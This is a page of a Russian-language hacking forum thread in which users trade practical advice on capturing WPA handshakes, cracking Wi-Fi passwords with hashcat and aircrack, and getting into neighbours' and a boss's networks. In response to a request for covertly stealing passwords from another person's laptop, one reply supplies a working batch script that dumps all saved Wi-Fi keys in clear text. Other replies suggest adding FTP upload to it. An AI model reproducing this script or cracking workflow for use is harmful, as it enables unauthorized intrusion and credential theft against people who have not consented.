PDA

Просмотр полной версии : [Wi-Fi, BT] Задай вопрос - получи ответ!


Страницы : 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27

moaddip
16.02.2016, 16:38
посоветуйте плиз лучший телефончик на андройд, для вардрайвинга, так сказать с good сигналом(антенной)..? может есть какие т модельки с улучшенной вардрайвостью) спс

Vikhedgehog
17.02.2016, 02:44
посоветуйте плиз лучший телефончик на андройд, для вардрайвинга, так сказать с good сигналом(антенной)..? может есть какие т модельки с улучшенной вардрайвостью) спс



Nexus 5/6

Можно установить Kali Nethunter и получишь полноценный хакерский телефон. Рекомендую.

J()KER
17.02.2016, 14:00
Nexus 5/6

Можно установить Kali Nethunter и получишь полноценный хакерский телефон. Рекомендую.



Нетхантер можно установить на практически любой телефон. Только сам нетхантер довольно глючный, как собственно и поделие для ПК.

Alvinng
17.02.2016, 23:53
Достался практически на халяву Lumia 950 XL. Под windows phone существуют приложения для вардрайвинга?

chernec
18.02.2016, 00:35
Ребята, как вы юзаете операционки для этих делишек? Ставите второй ос, на виртуалку или с флешки? Просто почему возник такой вопрос, потому что когда ставлю на виртуалку(я юзаю wifislax), он раздражительно подлагивает. Вопрос в следующем, будет ли лучше работать если приобрести процессор с Virtualization technology(на ноут). Сейчас CPU: T4300, ОЗУ: 4гб.

Alvinng
18.02.2016, 01:03
Юзаю этот образ wifislax. Никаких лагов не замечал. Также юзаю Kali linux тоже образ для vmware. Никаких проблем. Железо: i7 3630qm, 8 Gb RAM, GeForce GT650M.

J()KER
18.02.2016, 08:19
Никаких проблем. Железо: i7 3630qm



Ну ты сравнил, морковку с пальцем. У chernec нет поддержки VT-x.

chernec, какая виртуалка? Гостевые дополнения ставил? 3Д ускорение включал?

chernec
18.02.2016, 18:18
Ну ты сравнил, морковку с пальцем. У chernec нет поддержки VT-x.

chernec, какая виртуалка? Гостевые дополнения ставил? 3Д ускорение включал?



VirtualBox и vmware пробовал. 3Д ускорения включал, а вот за гостевые дополнения не слышал.

rootadmin
18.02.2016, 18:46
Парни, такой вопрос. Скажите, у кого какая максимальная скорость брута hashcat-ом (cuda, ocl). Пробовал на GTS660 - 33 килохеша/сек, нормально?

atlas28
18.02.2016, 19:47
Парни, такой вопрос. Скажите, у кого какая максимальная скорость брута hashcat-ом (cuda, ocl). Пробовал на GTS660 - 33 килохеша/сек, нормально?



Если речь о WPA2, то на относительно стареньких видюхах AMD в этом плане серьезно выигрывают. На новых уже не настолько сильно заметно. Скорость 33000Hs маловата, если честно, но в принципе сможешь брутить самые популярные пароли. У меня лично на моей семилетней HD5850@850/1200 85000-85500H/s

erwerr2321
18.02.2016, 20:04
Парни, такой вопрос. Скажите, у кого какая максимальная скорость брута hashcat-ом (cuda, ocl). Пробовал на GTS660 - 33 килохеша/сек, нормально?



Вот тут отдельная Тема

https://forum.antichat.ru/threads/276578/

marmisha
19.02.2016, 02:46
подскажите пожалуйста как подружить TP-Link Archer T2UH с wifislax, есть ли возможность?

fire-dance
19.02.2016, 10:51
подскажите пожалуйста как подружить TP-Link Archer T2UH с wifislax, есть ли возможность?



Есть чипы на которых работает программа какой там чип?

Хотите получить нормальный ответ задавайте корректный вопрос.

marmisha
19.02.2016, 16:19
чип стоит MediaTek MT7610U, пробовал в метрополисе, там свисток не определяется

SlNik
19.02.2016, 16:21
подскажите пожалуйста как подружить TP-Link Archer T2UH с wifislax, есть ли возможность?



Вся линейка от TP-Link - Archer - двухдиапазонная. Судя по дровам Ralink RT 2870

http://www.tp-link.com/il/download/Archer-T2UH.html#Driver

Всё зависит от того какую Вы версию Wifislax используете.

Рекомендую попробовать последнюю из тестовых. Там постоянно идут обновления по дровам.

http://beta.seguridadwireless.es/

За 17022016 вполне работоспособна.

marmisha
19.02.2016, 16:38
версия 4.10.1 Rus, найти драйверы не проблема, сложность состоит в том, чтобы установить их, с линуксом знаком слабо, по инструкции https://habrahabr.ru/sandbox/96077/, застрял, вот и спрашиваю ответа.

SlNik
19.02.2016, 17:31
сложность состоит в том, чтобы установить их,



Мой адаптер вообще не работал с 4.10.1. А с версией 4.11.1 стал функционировать. Были внесены в сборку конкретные изменения. Если есть желания помучаться, пожалуйста. Проще взять последнюю версию и попробовать. С флешки время займёт не много.

Warloc
20.02.2016, 17:18
Как перезагрузить точку доступа ар ? пользуюсь wifislax 4-11-1-final. Слышал про такую программу как ap-fucker но там много опций

и на английском языке. Спасибо.

marmisha
21.02.2016, 02:13
Мой адаптер вообще не работал с 4.10.1. А с версией 4.11.1 стал функционировать. Были внесены в сборку конкретные изменения. Если есть желания помучаться, пожалуйста. Проще взять последнюю версию и попробовать. С флешки время займёт не много.



к сожалению 4.11.1 версия проблему не решила, и 17022016 тоже

Andrey9999
21.02.2016, 04:59
Вообще собирать самому для некоторых свистков дело геморное

Я себе когда-то для slax'а TL-WN822N собирал - к интернету подключаться могу, но mon режим не работает...

А в WiFiSlax'е последнем он полностью фунциклирует)

cxta909
21.02.2016, 19:13
Имеются две wi-fi точки с роутеров D-link. Связь ними отличная, но хэндшейк не ловится. В чем могут быть причины? Как поймать хэндшейк? (заранее спасибо всем, кто ответит)

OctaMED3
24.02.2016, 12:45
возможно в макдаке подключится к сети без аутинтефикации при помощи мобильного телефона?на пример просканировать сейт и использовать чужой мак адресс для подключения?

еще вопрос- если есть доступ к интернеты то можно подключится к любому роутеру зная его bssid и essid?

erwerr2321
24.02.2016, 13:04
возможно в макдаке подключится к сети без аутинтефикации при помощи мобильного телефона?на пример просканировать сейт и использовать чужой мак адресс для подключения?

еще вопрос- если есть доступ к интернеты то можно подключится к любому роутеру зная его bssid и essid?



WTF???

Xeror
24.02.2016, 21:21
Установил ettercap

При сниффинге пишет bad packet detected skipping...

В чем проблема?

OctaMED3
25.02.2016, 03:27
я имел в виду, есть способ подключится в макдольдсе к wifi без получения смски на мобильный телфон.

а второй вопрос вытекает отсюда https://forum.antichat.ru/threads/435763/page-49 как подибрают пароль к сетям от которых люди далеко находятся

Прошу меня простить если спрашиваю всякий бред, я новичок в таких делах.

Volter
25.02.2016, 04:45
Здравствуйте, читаю темы в разделе Wi-fi, очень познавательно!

Играюсь с Hashcatом и AirSlax, такая ситуация: перехватил хендшейк (название точки доступа: Urik75), словарь очень популярный на форуме под названием small.txt, для максимальной скорости сразу прогнал AirSlax с помощью GPU - пароля не нашло (Radeon HD 5650 ~11 п/с). Уже в Windows 7 x64 использовал HashcatGUI by BlandyUK, прогнал по всем известным маленьким и средним словарям на форуме и вне - результат ноль. По слухам соседа пароль может состоять из двух полных дат рождений - тоже не помогло. Использовал в брут Urik?d?d?d?d? в различных комбинациях - ладно, не судьба. Попросил у владельца вай фай точки смартфон на пару минут позвонить, установил рут права, зашел в папку /data/misc/wifi/, открыл файл конфигураций wpa_supplicant.conf, и что я вижу, пароль: 76543210

В HashcatGUI подбор с помощью GPU и СPU не дает никаких положительных результатов, а вот проверив после в AirSlax СPU - пароль находит.

AirSlax СPU был уже в комплекте программы, а вот для взлома с помощью GPU скачивал с офф. сайта oldHashcat 2.01. Также для HashcatGUI by BlandyUK скачивал отдельно с офф. сайта oldHashcat и Hashcat.

Так в чём проблема ? В новых версиях ?

J()KER
25.02.2016, 08:39
Так в чём проблема ?



Хендшейк скинь

Volter
25.02.2016, 11:21
Хендшейк скинь



вот http://f-bit.ru/749350

Alexmeh
25.02.2016, 11:22
Так в чём проблема ?



Почитайте внимательнее:

Как вырезать handhsake из cap-файла. тут дабы уменьшить размер,

ссылка здесь:http://airslax.net/publ/kak_vyrezat_handshake_iz_cap_fajla/1-1-0-1

http://forum.antichat.ru/threads/274700/

еще полезная информация:

http://forum.antichat.ru/threads/431691/#post-3903820

проблема возможно в самом хендшейке

http://f-bit.ru/749350

нужен .сар формат, желательно оригинальный (не обрезанный)

P.S При переборе скаченного urik-Urik75-F4EC38EF1BD6.hccap хешкет пароль действительно не находит.

НО

При конвертации CapConverterом скачанного файла в Urik75.сар формат ewsa пароль нашла.

При конвертации уже Urik75 .сар файла в формат Urik75.hccap и перебором в хешкете

пароль уже нашелся.

fire-dance
25.02.2016, 19:41
Здравствуйте, читаю темы в разделе Wi-fi, очень познавательно!

Играюсь с Hashcatом и AirSlax, такая ситуация: перехватил хендшейк (название точки доступа: Urik75), словарь очень популярный на форуме под названием small.txt, для максимальной скорости сразу прогнал AirSlax с помощью GPU - пароля не нашло (Radeon HD 5650 ~11 п/с). Уже в Windows 7 x64 использовал HashcatGUI by BlandyUK, прогнал по всем известным маленьким и средним словарям на форуме и вне - результат ноль. По слухам соседа пароль может состоять из двух полных дат рождений - тоже не помогло. Использовал в брут Urik?d?d?d?d? в различных комбинациях - ладно, не судьба. Попросил у владельца вай фай точки смартфон на пару минут позвонить, установил рут права, зашел в папку /data/misc/wifi/, открыл файл конфигураций wpa_supplicant.conf, и что я вижу, пароль: 76543210

В HashcatGUI подбор с помощью GPU и СPU не дает никаких положительных результатов, а вот проверив после в AirSlax СPU - пароль находит.

AirSlax СPU был уже в комплекте программы, а вот для взлома с помощью GPU скачивал с офф. сайта oldHashcat 2.01. Также для HashcatGUI by BlandyUK скачивал отдельно с офф. сайта oldHashcat и Hashcat.

Так в чём проблема ? В новых версиях ?



скиньте весь фаил оригинал .cap

Volter
25.02.2016, 21:17
скиньте весь фаил оригинал .cap



Вот закинул http://f-bit.ru//749780

СЕРЖ32
26.02.2016, 10:44
кто знает,как у становить Airdrop-ng на wifi slax?везде описания,что он на kali ставится,нигде в гугле про wifi slax не говорится.

Warloc
26.02.2016, 18:41
Вопрос такой . Возможно сделать хедшечник не WPA2 а зашитой WPS, возможно его брутить а также заказать платный перебор пароля. В чем я не прав ?спасибо

Mistral
26.02.2016, 19:27
Возможно сделать хедшечник не WPA2 а зашитой WPS



А по-русски?Хедшечник,зашитый WPS-это чё такое?Если хе(э)ндшейк,то причём тут wps.И что мешает его получить без или с WPS.

Warloc
26.02.2016, 20:20
А по-русски?Хедшечник,зашитый WPS-это чё такое?Если хе(э)ндшейк,то причём тут wps.И что мешает его получить без или с WPS.



Wps это совсем другая зашита и не подается бруту пароля программами типа hashcat .

Volter
27.02.2016, 00:19
Здравствуйте, читаю темы в разделе Wi-fi, очень познавательно!

Играюсь с Hashcatом и AirSlax, такая ситуация: перехватил хендшейк (название точки доступа: Urik75), словарь очень популярный на форуме под названием small.txt, для максимальной скорости сразу прогнал AirSlax с помощью GPU - пароля не нашло (Radeon HD 5650 ~11 п/с). Уже в Windows 7 x64 использовал HashcatGUI by BlandyUK, прогнал по всем известным маленьким и средним словарям на форуме и вне - результат ноль. По слухам соседа пароль может состоять из двух полных дат рождений - тоже не помогло. Использовал в брут Urik?d?d?d?d? в различных комбинациях - ладно, не судьба. Попросил у владельца вай фай точки смартфон на пару минут позвонить, установил рут права, зашел в папку /data/misc/wifi/, открыл файл конфигураций wpa_supplicant.conf, и что я вижу, пароль: 76543210

В HashcatGUI подбор с помощью GPU и СPU не дает никаких положительных результатов, а вот проверив после в AirSlax СPU - пароль находит.

AirSlax СPU был уже в комплекте программы, а вот для взлома с помощью GPU скачивал с офф. сайта oldHashcat 2.01. Также для HashcatGUI by BlandyUK скачивал отдельно с офф. сайта oldHashcat и Hashcat.

Так в чём проблема ? В новых версиях ?



скиньте весь фаил оригинал .cap



Вот закинул http://f-bit.ru//749780

Volter
27.02.2016, 00:19
А как объединить 20 .cap файлов, кроме wireshark ? Подскажите

Alexmeh
27.02.2016, 00:36
А как объединить 20 .cap файлов, кроме wireshark ? Подскажите



Для чего?

fire-dance
27.02.2016, 03:44
Здравствуйте, читаю темы в разделе Wi-fi, очень познавательно!

Играюсь с Hashcatом и AirSlax, такая ситуация: перехватил хендшейк (название точки доступа: Urik75), словарь очень популярный на форуме под названием small.txt, для максимальной скорости сразу прогнал AirSlax с помощью GPU - пароля не нашло (Radeon HD 5650 ~11 п/с). Уже в Windows 7 x64 использовал HashcatGUI by BlandyUK, прогнал по всем известным маленьким и средним словарям на форуме и вне - результат ноль. По слухам соседа пароль может состоять из двух полных дат рождений - тоже не помогло. Использовал в брут Urik?d?d?d?d? в различных комбинациях - ладно, не судьба. Попросил у владельца вай фай точки смартфон на пару минут позвонить, установил рут права, зашел в папку /data/misc/wifi/, открыл файл конфигураций wpa_supplicant.conf, и что я вижу, пароль: 76543210

В HashcatGUI подбор с помощью GPU и СPU не дает никаких положительных результатов, а вот проверив после в AirSlax СPU - пароль находит.

AirSlax СPU был уже в комплекте программы, а вот для взлома с помощью GPU скачивал с офф. сайта oldHashcat 2.01. Также для HashcatGUI by BlandyUK скачивал отдельно с офф. сайта oldHashcat и Hashcat.

Так в чём проблема ? В новых версиях ?

Вот закинул http://f-bit.ru//749780



Попробовал,походу аирслах кривой,я конвертировал oldHashcat 2.01 все в порядке нашло,иногда так бывает что хендшейк какой то особенный непонятно или словленный от какой то особенной модели роутера еще никто етого ни понял, допустим есле с сайта хешкета конвертировать то может не найти и наоборот также,еще могут найти проги то что не нашли в хешкете ето Elcomsoft Wireless Security Auditor

Volter
27.02.2016, 08:57
Для чего?



да не хочу каждые 5 минут следующий хендшейк проверять, а так все сразу

Alexmeh
27.02.2016, 11:25
да не хочу каждые 5 минут следующий хендшейк проверять, а так все сразу



Для хешкета, файлов в формате .hccap:

https://forum.antichat.ru/threads/351633/page-29#post-3853543

Но никакого смысла в этом не вижу

erwerr2321
27.02.2016, 11:33
А как объединить 20 .cap файлов, кроме wireshark ? Подскажите



а если в linux, то

cat 1.hccap 2.hccap 3.hccap > all.hccap

ну или сколько там их у Вас...

Volter
27.02.2016, 12:46
а если в linux, то

cat 1.hccap 2.hccap 3.hccap > all.hccap

ну или сколько там их у Вас...



а если windows 7, то как быть ?

Volter
27.02.2016, 12:46
Для хешкета, файлов в формате .hccap:

https://forum.antichat.ru/threads/351633/page-29#post-3853543

Но никакого смысла в этом не вижу



Благодарю

AleAle_jag
29.02.2016, 03:44
У меня не хватает хендшейк Wifite. Ни разу. А вот Airslax схватил, но только десять штук в один файл запихал, а по отдельности не хочет. Что сделать, чтоб всё работало по-человечески? Или это всё из-за сетевухи?(Думаю тут дело не в руках и не в голове) И как после того как всё правильно заработает, перехватывать хендшейки автоматически, группами(примерно по 10, в разных файлах)?

Y2Kot
01.03.2016, 19:19
Подскажите пожалуйста, можно ли как то подключиться к андроид устройству по bluetooth без ввода пароля?

valokorden
02.03.2016, 05:34
У меня не хватает хендшейк Wifite. Ни разу. А вот Airslax схватил, но только десять штук в один файл запихал, а по отдельности не хочет. Что сделать, чтоб всё работало по-человечески? Или это всё из-за сетевухи?(Думаю тут дело не в руках и не в голове) И как после того как всё правильно заработает, перехватывать хендшейки автоматически, группами(примерно по 10, в разных файлах)?



Хенды вроде бы всегда кладутся в один файл еслм пользоваться скриптами автоматами, сам их не проверял так как все ручками делаю, проще и эффективно!!! А что вырезать Хенды из файла не судьба, тем же aircrack-ng

AleAle_jag
02.03.2016, 06:17
Хенды вроде бы всегда кладутся в один файл еслм пользоваться скриптами автоматами, сам их не проверял так как все ручками делаю, проще и эффективно!!! А что вырезать Хенды из файла не судьба, тем же aircrack-ng



Я уже понял, что на автомате в один файлик и по размеру они 100(или меньше) кб, когда одиночные могут достигать одного мб. У меня просто не получается ловить одиночные. А как взломать автоматический в кали? То есть словил а файлик в 30 хендшейков в аирслаксе, а хочу пропустить по базе паролей не на цпу(1000 пар\с примерно), а на oclhashcat с помощью гпу(может быстрее даст), в аирслаксе нельзя тк его надо купить.

Slax007
02.03.2016, 19:45
Подскажите пожалуйста как подключиться к скрытой сети в wifislax 4.10.1 ? раньше был wicd но теперь его нигде не могу найти, если ли еще способы?

hydra
02.03.2016, 20:30
Подскажите пожалуйста как подключиться к скрытой сети в wifislax 4.10.1 ? раньше был wicd но теперь его нигде не могу найти, если ли еще способы?



apt-get install wicd попробуй

Kolhozan
02.03.2016, 20:44
Подскажите пожалуйста как подключиться к скрытой сети в wifislax 4.10.1 ? раньше был wicd но теперь его нигде не могу найти, если ли еще способы?



Воспользоваться тестовой версией http://beta.seguridadwireless.es/ wicd присутствует.

Algierd
06.03.2016, 18:37
usb-адаптер awus036h на Убунте (в принципе под другими дистрибутивами) нормально не работает в сёрфинге пока из терминала не дашь команду iwconfig wlx00c0ca72594b rate 5.5M fixed. Может кто-нибудь подскажет как можно автоматизировать всё это дело, чтобы каждый раз при перезагрузке не лезть в консоль?

morlin
07.03.2016, 11:08
Просьба проверить хендшейк, не пойму может он пустой или неправильный, или подскажите как самому понять. У меня там через варшарк показывает всего 2, Mesage 1 - 4 и Mesage 2 - 4, этого хватит чтобы сбрутить пароль?

http://rghost.ru/7cR97P6Kr

Volter
07.03.2016, 19:39
Где можно ознакомится с созданиям правил для брута и узнать, что они из себя представляют ? Не могу найти на форуме

Algierd
09.03.2016, 12:09
Есть вопрос: имеется физический доступ к чужому ноутбуку на котором вайфай. Есть ли какая-нибудь программка которую можно записать на флешку, подключить её к ПК и она сама тихо-скрытно сохранит искомый пароль?

binarymaster
09.03.2016, 13:03
Есть вопрос: имеется физический доступ к чужому ноутбуку на котором вайфай. Есть ли какая-нибудь программка которую можно записать на флешку, подключить её к ПК и она сама тихо-скрытно сохранит искомый пароль?



Варианты:

1. Router Scan в тихом режиме

2. NirSoft WirelessKeyView - начиная с Vista, умеет экспортировать в CSV

3. wifidump.cmd :

@echo off
:: WLAN profile dumper by binarymaster
:: Requires Windows 7 or higher + administrator rights
:: Tested only with Windows 7
setlocal enabledelayedexpansion
chcp 10000 > nul
cd %~dp0
netsh wlan show profile | find " : " > wlan.txt
for /F "tokens=2,2* delims=:" %%A in (wlan.txt) do (
set ln=%%A
set ln=!ln:~1!
netsh wlan show profile key=clear "!ln!" >> pasw.txt
)
del wlan.txt

morlin
11.03.2016, 21:02
Как поймать хендшейк именно с четырьмя EAPOL пакетами, Mesage 1 - 4, 2 -4, 3 - 4 и 4 - 4. Сколько ни ловлю хендшейков, там только 1 - 4 и 2 - 4. Ловлю с wifislax на вмварьке хендшейкером или гойскриптом, короче хендшейки не брутятся, хотя гугл пишет что пароль именно в этих двух первых пакетах, но предпочтительно иметь полноценный хендшейк со всеми четырьмя пакетами.

Linksach
11.03.2016, 21:23
Как поймать хендшейк именно с четырьмя EAPOL пакетами, Mesage 1 - 4, 2 -4, 3 - 4 и 4 - 4. Сколько ни ловлю хендшейков, там только 1 - 4 и 2 - 4. Ловлю с wifislax на вмварьке хендшейкером или гойскриптом, короче хендшейки не брутятся, хотя гугл пишет что пароль именно в этих двух первых пакетах, но предпочтительно иметь полноценный хендшейк со всеми четырьмя пакетами.



Handshacker 4 пакета ловит в вифислакс только в версии 4.10.Goyscript как ни крути всегда ловит только 2 пакета.Мой совет в вифислакс пользоваться minidwep-почти постоянно 4 пакета и брутятся хорошо.И чтоб поймать полноценный хендшейк нужно иметь хороший сигнал до точки доступа и от точки доступа до клиента.Удачи!Не получается поймать в вифислакс пробуй в kali linux.Я думаю что можно записать на dvd или флэшку kali linux и попробовать поймать то что нужно

hydra
11.03.2016, 22:25
Как поймать хендшейк именно с четырьмя EAPOL пакетами, Mesage 1 - 4, 2 -4, 3 - 4 и 4 - 4. Сколько ни ловлю хендшейков, там только 1 - 4 и 2 - 4. Ловлю с wifislax на вмварьке хендшейкером или гойскриптом, короче хендшейки не брутятся, хотя гугл пишет что пароль именно в этих двух первых пакетах, но предпочтительно иметь полноценный хендшейк со всеми четырьмя пакетами.



Хэндшейки нужно проверять самому.Скрипты часто ловят их кривыми.Вот они и не брутятся.

Проверить можно хотябы так: pyrit -r xxx.cap analyze Вывод должен быть примерно таким:

#1: Station 9c:80:df:37:b8:fc, 11 handshake(s):

#1: HMAC_SHA1_AES, good, spread 9

#2: HMAC_SHA1_AES, workable, spread 15

#6: HMAC_SHA1_AES, bad, spread 6

Ну или в Wireshark можно.Но тут нужны хоть малмальские знания.Более подробней об этом ищи в ветках.Инфа 100% есть.Наличие EAPOL пакетов,вовсе не гарантирует их полноту и целостность.Временные интервалы между ними должны быть не более 1 секунды.

Да,желательно иметь все 4 пакета.Но вовсе не обязательно.

Linksach
12.03.2016, 21:49
интересно УЗНАТЬ кто-нибудь реализовал уязвимость hole 196.Если у кого получилось отпишитесь пожалуйста в этой ветке.У меня одна точка с хорошим сигналом без клиентов уже висит один год и как к ней подключится ума не приложу.Советовали с помощью соц.инженерии-metasploita и meterpretera но я пока не пробовал пробится на комп

yx-ex
12.03.2016, 22:15
Есть вопрос: имеется физический доступ к чужому ноутбуку на котором вайфай. Есть ли какая-нибудь программка которую можно записать на флешку, подключить её к ПК и она сама тихо-скрытно сохранит искомый пароль?



http://rghost.ru/private/7SNdJrLpX/fd514b95fea227a128eee034026a2f6b

пришел с флешкой,вставил,считал пароли,сохранил в текстовый файл на ту же флешку,выдернул флешку,ушёл......)))))) Действий на 30 секунд.

djamv
13.03.2016, 04:46
wifidump.cmd



Огромное спасибо за этот cmd'ник . Win10 работает корректно

я правильно понимаю, что можно еще прикрутить в этот скрипт загрузку файла на ftp сервер?

http://forum.oszone.net/thread-137725.html

djamv
13.03.2016, 04:48
пришел с флешкой,вставил,считал пароли,сохранил в текстовый файл на ту же флешку



На win10 не сработало, а вот скрипт от binarymaster'a да. Программа опрелелила как win8

yx-ex
13.03.2016, 13:14
На win10 не сработало, а вот скрипт от binarymaster'a да. Программа опрелелила как win8



Не знаю как на 10,но на 7ках 32 и 64 срабатывает только в путь.Ровненькие столбики Имя Сети-Пасс,все что на жертве когда либо вводились. И нравится что работает без установки.Скопировал на флешку-и запускай сразу.

TvoR_mama
13.03.2016, 13:28
Подскажите,пожалуйста,купи л недавно маршрутизатор и начал настраивать через браузер,так вот,такой вопрос:"Как он понимает,что я владелец,а не какой-то "левый" человек,вдруг кто-то захочет сменить мои настройки",просто я в этом полный чайник.

LOCb
13.03.2016, 14:29
Всем привет, столкнулся с проблемой. сеть открытая, запускаю aircrack , а дальше, независимо от того, чем я пишу дамп, aircrack или wieshark, ниже уровня 802.11 данные не читаются, при этом я без пробле могу подключаться к сти без паролей и т.д. Питоний Scapy показал мне тоже самое. Говорит зашифровано.

Скрин1 http://62.148.145.150/air.png

Скрин2 http://62.148.145.150/wire.png

binarymaster
13.03.2016, 23:15
я правильно понимаю, что можно еще прикрутить в этот скрипт загрузку файла на ftp сервер?



Да, всё правильно. Скрипт на выходе даёт файл pasw.txt

Richmounth
14.03.2016, 00:31
Подскажите,пожалуйста,купи л недавно маршрутизатор и начал настраивать через браузер,так вот,такой вопрос:"Как он понимает,что я владелец,а не какой-то "левый" человек,вдруг кто-то захочет сменить мои настройки",просто я в этом полный чайник.



Ему все равно,

1- авторизация проходит логин- пароль, ваше дело закрыть внешний доступ, поставить сложный пароль.

2- если роутер дырявый ставить можно хоть какой пароль, он будет вскрыт. Например PixieDust/

3- выключить WPS/

4- если он уязвим перед RS внешний доступ будет приводить к сливу данных.

Какой у вас? сразу можно сказать о уязвимостях

TOX1C
15.03.2016, 13:11
Столкнулся с такой проблемой, что при бруте видеокартой ewsa и hashcat не могут найти пароль, хоть он есть в словаре. Или находят, но со второго-третьего раза. При этом, видеокарта не артефачит, не глючит и т.д. Есть ли способ проверить карту на вшивость, может софт какой-то?

jashertj
15.03.2016, 15:44
привет всем есть такой вопрос можно ли как нибудь настроить роутер чтоб он выступал вроде приёмника т.е как обычный wifi адаптер чтоб я через комп мог искать точки wifi поблизости

модель роутера tp link марку напишу позже

binarymaster
15.03.2016, 17:46
Подскажите как сделать так чтобы при создании wi-fi моста в сетевой инфраструктуре пк к которому подкл роутер не отображался второй подкл роутер (к примеру TP-LINK-3020)


Отключить на нём UPnP.

richardleol
15.03.2016, 18:04
Отключить на нём UPnP.



А из-за отключенного UPnP ничего не "отвалится"?

binarymaster
15.03.2016, 18:23
А из-за отключенного UPnP ничего не "отвалится"?



Не могу гарантировать, но это единственный способ в данном случае.

Kevin Shindel
18.03.2016, 12:16
Котята помогите.

Суть проблемы.

Есть ноут с двумя карточками. Хочу сделать бридж между wlan0 и wlan1.

Но что то не получается.

Algierd
19.03.2016, 01:21
Вопрос: телефон принимает соседский wi-fi. Как его прикрутить к PC чтобы интернет был на Большом Брате?

henri2002
19.03.2016, 01:31
Вопрос: телефон принимает соседский wi-fi. Как его прикрутить к PC чтобы интернет был на Большом Брате?



купить юсб фай фаевский свисток.

Richmounth
19.03.2016, 15:52
Вопрос: телефон принимает соседский wi-fi. Как его прикрутить к PC чтобы интернет был на Большом Брате?



Поставить драйвер телефона на PC, подключить по кабелю телефон (usb) и включить режим модема.

Richmounth
20.03.2016, 02:02
Котята помогите.

Суть проблемы.

Есть ноут с двумя карточками. Хочу сделать бридж между wlan0 и wlan1.

Но что то не получается.



Cэрр, мы так то котаны епта.

Kevin Shindel
20.03.2016, 09:28
Прошу пардона, писал в отчаяньи

Richmounth
20.03.2016, 12:20
А мост к чему? Цель. Чтобы немного понимать о чем ты говоришь.

Volter
21.03.2016, 00:42
Если к планшету/смартфону подключить через micro-usb с помощью переходника wi-fi адаптер и загрузить на девайс дистрибьют линукса, то можно ли таким способом ловить хендшейки. Видел статьи со сложностями во внутреннем адаптере, а как обстоят дела со внешним ?

morlin
21.03.2016, 10:40
Проверьте плис кто нибудь хендшейк на валидность. Там много EAPOL пакетов, но все они Message 1 - 4 и 3 - 4, отсутствуют 2 - 4 и 4 - 4. Есть ли смысл брутить такой хендшейк или там нету пароля? http://rghost.ru/6WKJgmd8l

user100
21.03.2016, 10:48
Проверьте плис кто нибудь хендшейк на валидность. Там много EAPOL пакетов, но все они Message 1 - 4 и 3 - 4, отсутствуют 2 - 4 и 4 - 4. Есть ли смысл брутить такой хендшейк или там нету пароля? http://rghost.ru/6WKJgmd8l



такой ХШ не подойдет для брута. должны быть пары EAPOL пакетов 1-4 + 2-4 или 3-4 +4-4.



Если к планшету/смартфону подключить через micro-usb с помощью переходника wi-fi адаптер и загрузить на девайс дистрибьют линукса, то можно ли таким способом ловить хендшейки. Видел статьи со сложностями во внутреннем адаптере, а как обстоят дела со внешним ?



Да со внешнем свистком такое возможно, если планшет - смартфон нормально поддерживает функцию OTG.

Haer
23.03.2016, 19:03
Привет всем, пользуюсь Ralink 3070 ( Точнее купил ) но борода в том что CommView for WiFi которую я обычно юзал для ловли шендш, не может загрузить драйвер, видать дело в ос вин 10, есть ли другие варианты работы из винды?

alian
24.03.2016, 22:47
Народ, подскажите прогу или скрипт, которые автоматом перебирают точки и "раскручивают" их на хэндшейки.

henri2002
24.03.2016, 22:57
Народ, подскажите прогу или скрипт, которые автоматом перебирают точки и "раскручивают" их на хэндшейки.



в этом пакете есть.

aircrack-ng

UNIXTREID
25.03.2016, 16:08
У меня такой вопрос: кто-нибудь слышал о способах взлома ПК напрямую через адаптер? То есть комп даже может быть не подключен к точке, просто включен Wi-Fi адаптер и путём различного рода уязвимостей (через посылку сформированных пакетов и т.п.) можно к нему через адаптер прицепиться. Нигде не могу найти инфу по данному вопросу Читал только где-то, что такое возможно через определённые уязвимые модели старых карт Intel PRO. Подскажите, если кто знает по данной теме.

annANB
28.03.2016, 13:00
Всем привет! Подскажите как вырезать нужный бэкон и хэндшэйк из общего cap файла с помощью wireshark. Выделяю нужные пакеты, однако при нажатии save as у меня почему-то не появляется меню packet range как на картинке. В связи с этим не могу выбрать selected packets. Может кто сталкивался с такой проблемой? Возможно дело в версии wireshark или я просто торможу по черному?

http://airslax.net/4.jpg

atlas28
28.03.2016, 13:10
Всем привет! Подскажите как вырезать нужный бэкон и хэндшэйк из общего cap файла с помощью wireshark. Выделяю нужные пакеты, однако при нажатии save as у меня почему-то не появляется меню packet range как на картинке. В связи с этим не могу выбрать selected packets. Может кто сталкивался с такой проблемой? Возможно дело в версии wireshark или я просто торможу по черному?



Можешь сделать проще: применить фильтр и сохранить displayed


wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x04 || eapol
Либо просто выделяешь нужные пакеты и ставишь selectes packed O_O У меня с этим проблем никаких не возникает в последнем wireshark'e. Может ты их неправильно выделяешь?

devi_black
28.03.2016, 13:20
"Export Specified Packets..."

annANB
28.03.2016, 13:27
Огромное спасибо бро!!! "Export Specified Packets..." сработало!

Bogdan87
29.03.2016, 21:35
Всем привет я новичок в этом совсем, прочитал тему для новичков, зашел на сайт чтобы скачать Backtrack но написано что проект закрыт, откуда что качать ребята, буду очень признателен

VladimirV
29.03.2016, 21:38
Всем привет я новичок в этом совсем, прочитал тему для новичков, зашел на сайт чтобы скачать Backtrack но написано что проект закрыт, откуда что качать ребята, буду очень признателен



Почитайте здесь:

https://forum.antichat.ru/threads/438367/

https://forum.antichat.ru/threads/423233/

Richmounth
29.03.2016, 21:44
Почитайте здесь:

https://forum.antichat.ru/threads/438367/

https://forum.antichat.ru/threads/423233/



Что же так жестко, хочет Bactrack дадим http://technoknol.blogspot.com/2012/08/download-backtrack-5-r3-direct-links.html

safinruslan
01.04.2016, 21:50
Добрый день. Взломал начальнику wifi. Но его айфон и ноут леново не хочет подключаться. Пароль восьмициферник. Сомневаюсь, что в офисе будут ставить фильтрацию по мас, ограничения какие-нить по кол-ву подключенных аппаратов. Что может быть еще?

VladimirV
01.04.2016, 21:53
Добрый день. Взломал начальнику wifi. Но его айфон и ноут леново не хочет подключаться. Пароль восьмициферник. Сомневаюсь, что в офисе будут ставить фильтрацию по мас, ограничения какие-нить по кол-ву подключенных аппаратов. Что может быть еще?



Если с других устройств подключались - тогда 'N only'

safinruslan
01.04.2016, 22:34
Если с других устройств подключались - тогда 'N only'



Нет, начальник обладает только айфоном и ноутом. Которые не подключилсь при очень хорошем сигнале. Лично я там не был. Точка рабочая, хендшейк же пойман.

VladimirV
01.04.2016, 22:40
